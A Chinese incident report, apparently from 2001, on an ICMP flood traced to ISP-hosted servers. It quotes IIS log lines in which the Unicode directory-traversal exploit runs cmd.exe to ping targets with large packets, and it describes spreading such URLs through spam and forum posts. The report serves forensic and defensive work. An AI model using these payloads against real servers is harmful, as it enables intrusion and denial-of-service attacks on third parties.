广东某地网络攻击事件全镜头

某数据分局问题的解决：

　　一、 建议关闭ICMP通信来预防同类攻击，据该单位负责人发言，已经在其交换机CISCO5509上采取这样的措施了。
　　二、 安装网警，检测看看是否存在其他入侵。目前网警已经正常运行中。
　　三、 联系某ISP进行取证，发现入侵源。


某ISP取证过程：

　　在4月11日下午，安络工程师王、冯、陈到某ISP现场取证。分析某ISP的网警数据发现ICMP包已经超过30%，攻击源依然是内部托管的用户主机202.xxx.xxx.208、202.xxx.xxx.250、202.xxx.xxx.251三台机器，但攻击目标已经改变为61.xxx.xxx.157（详细请看网警运行时的界面，如图）。在分析过程中，另外发现202.xxx.xxx.233也有类似被入侵作为扫描源的现象，已报告王工程师。





　　图表说明：攻击源依然是内部托管的用户主机202.xxx.xxx.208、202.xxx.xxx.250、202.xxx.xxx.251三台机器，但攻击目标已经改变为61.xxx.xxx.157



图表说明：ICMP包已经超过30%

　　在某ISP及其客户的配合下，分析202.xxx.xxx.208 的IIS日志，发现在3月5日02:45:41已经有来自IP 202.98.223.237使用IIS UNICODE漏洞对202.xxx.xxx.208进行初步入侵。在3月6日起就发现来自不同源IP的URL请求使用同一漏洞调用PING程序对不同的攻击目标进行攻击。（具体请看 日志片段）


2001-03-05 02:45:41 202.98.223.237（第一次攻击来源IP） - 202.xxx.xxx.208 80 GET /scripts/..\../winnt/system32/cmd.exe /c+dir%20c:\ 200 （第一次攻击）
2001-03-06 14:55:22 211.159.7.248 - 202.xxx.xxx.208 80 GET /scripts/..\../winnt/system32/cmd.exe /c+ping+-l+65000+-n+500+211.159.5.9 502
2001-03-06 16:03:09 202.100.207.75 - 202.xxx.xxx.208 80 GET /scripts/..\../winnt/system32/cmd.exe /c+ping+-l+65000+-n+500+202.100.88.68 502
2001-03-06 16:37:52 202.105.40.225 - 202.xxx.xxx.208 80 GET /scripts/..\../winnt/system32/cmd.exe /c+ping+-l+65000+-n+500+61.140.163.140 502
2001-03-06 17:12:38 61.128.158.33 - 202.xxx.xxx.208 80 GET /scripts/..\../winnt/system32/cmd.exe /c+ping+-l+65000+-n+500+61.128.137.236 502 2001-03-06 17:26:14 61.158.242.23 - 202.104.139.208 80 GET /scripts/..\../winnt/system32/cmd.exe /c+ping+-l+65000+-n+500+61.143.3.140 502
2001-03-06 17:27:39 61.139.23.86 - 202.xxx.xxx.208 80 GET /scripts/..\../winnt/system32/cmd.exe /c+ping+-l+65000+-n+500+61.139.36.97 502
2001-03-06 18:34:25 61.147.61.202 - 202.xxx.xxx.208 80 GET /scripts/..\../winnt/system32/cmd.exe /c+ping+-l+65000+-n+6666+61.132.13.225 502
2001-03-06 19:44:52 61.139.23.86 - 202.xxx.xxx.208 80 GET /scripts/..\../winnt/system32/cmd.exe /c+ping+-l+65000+-n+500+61.141.80.200 502
2001-03-06 23:22:54 24.108.6.81 - 202.xxx.xxx.208 80 GET /scripts/..\../winnt/system32/cmd.exe /c+ping+-l+65000+-n+500+216.66.144.94 502
2001-04-10 00:51:21 61.144.246.135 - 202.xxx.xxx.208 80 GET /scripts/..\../winnt/system32/cmd.exe /c+ping+-l+65000+-n+100+61.150.227.133 502
2001-04-10 00:52:30 211.167.112.14 - 202.xxx.xxx.208 80 GET /scripts/..\../winnt/system32/cmd.exe /c+ping+-l+65000+-n+9999+202.160.249.50 502
2001-04-10 01:03:19 211.167.112.14 - 202.xxx.xxx.208 80 GET /scripts/..\../winnt/system32/cmd.exe /c+ping+-l+65000+-n+9999+202.160.249.50 502
2001-04-10 01:14:05 211.167.112.14 - 202.xxx.xxx.208 80 GET /scripts/..\../winnt/system32/cmd.exe /c+ping+-l+65000+-n+9999+202.160.249.50 502
2001-04-10 01:17:55 211.98.23.125 - 202.xxx.xxx.208 80 GET /scripts/..\../winnt/system32/cmd.exe /c+ping+-l+65000+-n+200+211.98.23.134 502
2001-04-10 01:43:51 211.167.112.14 - 202.xxx.xxx.208 80 GET /scripts/..\../winnt/system32/cmd.exe /c+ping+-l+65000+-n+9999+202.160.249.50 502


结果分析

　　由此看出，在日志中，请求源并非固定的IP，每次PING程序所指定的目标主机也不是固定的。在202.xxx.xxx.250的日志文件与此类同，在202.xxx.xxx.251机器上未设置日志审核，所以没有日志记录。黑客用了一定的技巧使请求的源成了随机IP(具体做法如：发垃圾邮件使接收者自动打开URL,在有一定访问量的网页上做了这样的连接，在安全性不高的聊天室，BBS等地方贴出这样的URL，使用特定的程序来完成)。黑客攻击的目标并不是唯一的。分析两台机器的日志来看，初次访问这两台机器这个漏洞的IP是相同的。所以202.98.223.237是肇事者IP。最后，安络收集提取有关电子证据，配合客户向公安机关报案。目前该案肇事者已被锁定。
 

【责任编辑：wuhanman】